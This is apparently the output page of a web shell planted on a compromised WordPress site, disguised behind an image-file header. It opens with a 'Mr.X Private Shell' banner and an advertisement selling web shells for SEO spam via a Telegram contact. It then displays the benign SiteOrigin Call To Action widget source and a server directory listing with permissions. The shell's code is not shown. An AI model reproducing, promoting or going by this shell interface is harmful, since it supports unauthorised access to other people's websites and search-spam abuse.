����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
/*
Widget Name: Call To Action
Description: Insert a title, subtitle, and button. Get visitors moving in the right direction.
Author: SiteOrigin
Author URI: https://siteorigin.com
Documentation: https://siteorigin.com/widgets-bundle/call-action-widget/
*/
class SiteOrigin_Widget_Cta_Widget extends SiteOrigin_Widget {
function __construct() {
parent::__construct(
'sow-cta',
__( 'SiteOrigin Call To Action', 'so-widgets-bundle' ),
array(
'description' => __( 'Insert a title, subtitle, and button. Get visitors moving in the right direction.', 'so-widgets-bundle' ),
'help' => 'https://siteorigin.com/widgets-bundle/call-action-widget/'
),
array(
),
false ,
plugin_dir_path( __FILE__ )
);
}
/**
* Initialize the CTA Widget.
*/
function initialize() {
// This widget requires the Button Widget.
if ( ! class_exists( 'SiteOrigin_Widget_Button_Widget' ) ) {
SiteOrigin_Widgets_Bundle::single()->include_widget( 'button' );
}
$this->register_frontend_styles(
array(
array(
'sow-cta-main',
plugin_dir_url( __FILE__ ) . 'css/style.css',
array(),
SOW_BUNDLE_VERSION
)
)
);
$this->register_frontend_scripts(
array(
array(
'sow-cta-main',
plugin_dir_url( __FILE__ ) . 'js/cta' . SOW_BUNDLE_JS_SUFFIX . '.js',
array( 'jquery' ),
SOW_BUNDLE_VERSION
)
)
);
}
function get_settings_form() {
return array(
'responsive_breakpoint' => array(
'type' => 'measurement',
'label' => __( 'Responsive Breakpoint', 'so-widgets-bundle' ),
'default' => '780px',
'description' => __( "This setting controls when the mobile alignment will be used. The default value is 780px.", 'so-widgets-bundle' )
),
);
}
function get_widget_form() {
return array(
'title' => array(
'type' => 'text',
'label' => __( 'Title', 'so-widgets-bundle' ),
),
'sub_title' => array(
'type' => 'text',
'label' => __( 'Subtitle', 'so-widgets-bundle' )
),
'design' => array(
'type' => 'section',
'label' => __( 'Design', 'so-widgets-bundle' ),
'fields' => array(
'colors' => array(
'type' => 'section',
'label' => __( 'Colors', 'so-widgets-bundle' ),
'fields' => array(
'background_color' => array(
'type' => 'color',
'label' => __( 'Background Color', 'so-widgets-bundle' ),
'default' => '#f8f8f8'
),
'border_color' => array(
'type' => 'color',
'label' => __( 'Border Color', 'so-widgets-bundle' ),
'default' => '#e3e3e3',
),
'title_color' => array(
'type' => 'color',
'label' => __( 'Title Color', 'so-widgets-bundle' ),
),
'subtitle_color' => array(
'type' => 'color',
'label' => __( 'Subtitle Color', 'so-widgets-bundle' ),
),
),
),
'layout' => array(
'type' => 'section',
'label' => __( 'Layout', 'so-widgets-bundle' ),
'fields' => array(
'desktop' => array(
'type' => 'select',
'label' => __( 'Desktop Button Align', 'so-widgets-bundle' ),
'default' => 'right',
'options' => array(
'top' => __( 'Center Top', 'so-widgets-bundle' ),
'left' => __( 'Left', 'so-widgets-bundle' ),
'bottom' => __( 'Center Bottom', 'so-widgets-bundle' ),
'right' => __( 'Right', 'so-widgets-bundle' ),
),
),
'mobile' => array(
'type' => 'select',
'label' => __( 'Mobile Button Align', 'so-widgets-bundle' ),
'default' => 'right',
'options' => array(
'' => __( 'Desktop Button Align', 'so-widgets-bundle' ),
'above' => __( 'Center Top', 'so-widgets-bundle' ),
'below' => __( 'Center Bottom', 'so-widgets-bundle' ),
),
),
),
),
),
),
'button' => array(
'type' => 'widget',
'class' => 'SiteOrigin_Widget_Button_Widget',
'label' => __( 'Button', 'so-widgets-bundle' ),
),
);
}
function modify_instance( $instance ) {
if ( empty( $instance ) || empty( $instance['design'] ) ) {
return array();
}
if ( isset( $instance['design']['background_color'] ) ) {
$instance['design']['colors'] = array();
$instance['design']['colors']['background_color'] = $instance['design']['background_color'] ;
$instance['design']['colors']['title_color'] = $instance['design']['title_color'];
$instance['design']['colors']['subtitle_color'] = $instance['design']['subtitle_color'];
$instance['design']['layout'] = array();
$instance['design']['layout']['desktop'] = $instance['design']['button_align'] ;
}
return $instance;
}
function get_less_variables( $instance ) {
if ( empty( $instance ) || empty( $instance['design'] ) ) {
return array();
}
$less_vars = array(
'border_color' => ! empty( $instance['design']['colors']['border_color'] ) ? $instance['design']['colors']['border_color'] : '',
'background_color' => ! empty( $instance['design']['colors']['background_color'] ) ? $instance['design']['colors']['background_color'] : '',
'title_color' => ! empty( $instance['design']['colors']['title_color'] ) ? $instance['design']['colors']['title_color'] : '',
'subtitle_color' => ! empty( $instance['design']['colors']['subtitle_color'] ) ? $instance['design']['colors']['subtitle_color'] : '',
'button_align' => ! empty( $instance['design']['layout']['desktop'] ) ? $instance['design']['layout']['desktop'] : '',
'mobile_button_align' => ! empty( $instance['design']['layout']['mobile'] ) ? $instance['design']['layout']['mobile'] : '',
);
$global_settings = $this->get_global_settings();
if ( ! empty( $global_settings['responsive_breakpoint'] ) ) {
$less_vars['responsive_breakpoint'] = ! empty( $global_settings['responsive_breakpoint'] ) ? $global_settings['responsive_breakpoint'] : '780px';
}
return $less_vars;
}
function modify_child_widget_form( $child_widget_form, $child_widget ) {
unset( $child_widget_form['design']['fields']['align'] );
unset( $child_widget_form['design']['fields']['mobile_align'] );
return $child_widget_form;
}
function get_form_teaser() {
if ( class_exists( 'SiteOrigin_Premium' ) ) return false;
return sprintf(
__( 'Get more font customization options with %sSiteOrigin Premium%s', 'so-widgets-bundle' ),
'<a href="https://siteorigin.com/downloads/premium/?featured_addon=plugin/cta" target="_blank" rel="noopener noreferrer">',
'</a>'
);
}
}
siteorigin_widget_register('sow-cta', __FILE__, 'SiteOrigin_Widget_Cta_Widget');
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| assets | Folder | 0755 |
|
|
| css | Folder | 0755 |
|
|
| js | Folder | 0755 |
|
|
| styles | Folder | 0755 |
|
|
| tpl | Folder | 0755 |
|
|
| cta.php | File | 6.47 KB | 0644 |
|
| error_log | File | 1.04 KB | 0644 |
|